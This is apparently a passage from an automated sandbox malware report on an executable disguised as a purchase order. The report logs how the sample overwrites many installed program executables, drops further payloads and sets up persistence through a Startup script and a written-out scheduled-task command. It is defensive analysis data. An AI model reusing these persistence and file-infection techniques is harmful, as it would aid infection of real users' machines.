                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\server01.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                        Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Windows\System32\alg.exeJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbsJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbsJump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00ADCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00ADCBD0

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Users\user\AppData\Roaming\90fdfad63d8f4c72.bin offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 95744Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 669260Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 672768Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 1220608Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 1221632Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 1224840Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 669184Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 53125Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Windows\System32\alg.exe offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Users\user\AppData\Local\Temp\aut7AD4.tmp offset: 0Jump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile written: C:\Users\user\AppData\Local\Temp\aut7AD4.tmp offset: 344064Jump to behavior
